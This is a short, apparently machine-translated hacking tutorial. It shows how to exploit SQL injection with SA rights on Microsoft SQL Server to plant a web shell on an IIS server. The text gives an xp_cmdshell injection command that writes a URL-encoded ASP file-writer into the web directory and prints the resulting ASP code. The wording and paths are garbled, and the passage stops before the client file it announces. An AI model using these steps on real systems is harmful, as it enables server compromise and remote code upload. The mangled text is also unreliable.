This article is suitable for SA authority SQL Server database, and how can SQL to support the server SQL injection of FSO ASP, how to upload the treasure horses, have always been a more headache, and I have another way to upload the Trojan here. 1. When SQL is injected, use XP_cmdshell to write an ASP file that can write files on the server.
Contents of the file: <% Set objFSO = Server.CreateObject ( "Scripting.FileSystemObject") Set objCountFile = objFSO.CreateTextFile (request ( "mypath"), True) objCountFile.Write request ( "mydata") objCountFile.Close%> This file line can be written <% Set objFSO = Server.CreateObject ( "Scripting.FileSystemObject"): Set objCountFile = objFSO.CreateTextFile (request ( "mypath"), True): objCountFile.Write request ( "mydata"): objCountFile.Close% > Encoding special characters can get% 3C% 25set% 20ObJFSO% 20 =% 20 Server.createObject (% 22Scripting.FileSystemObject% 22): set% 20objcountFile = Objfso.createTextFile (Request (% 22myPath% 22), true): Objcountfile.write% 20Request (% 22myData% 22): objcountfile.close% 25% 3e injection (here the Web directory is c: / inetpub / wwwroot /): Exec master..xp_cmdshell 'echo "% 3C% 25set% 20objfso% 20 =% 20Server.CreateObject (% 22Scripting.FileSystemObject% 22): Set% 20objCountFile = objFSO.CreateTextFile (request (% 22mypath% 22), True): objCountFile.Write% 20request (% 22mydata% 22): objCountFile.Close% 25% 3e "> c: /inetpub/wwrow/ftp.asp '; this will generate an ftp.asp file in the server's web directory to generate the code of <% set objfso = server.create Object ("scripting.filesystemObject") set objcountfile = objfso.createtextfile (Request ("MyPath"), true) ObjcountFile.write Request ("MyData") ObjcountFile.Close%> You can see that two of the above code The interface mypath and mydata mypath are the generation of files for the next time the file MyData is the content of the file. The contents of the file are written in the local document: RohuClient.htm code is as follows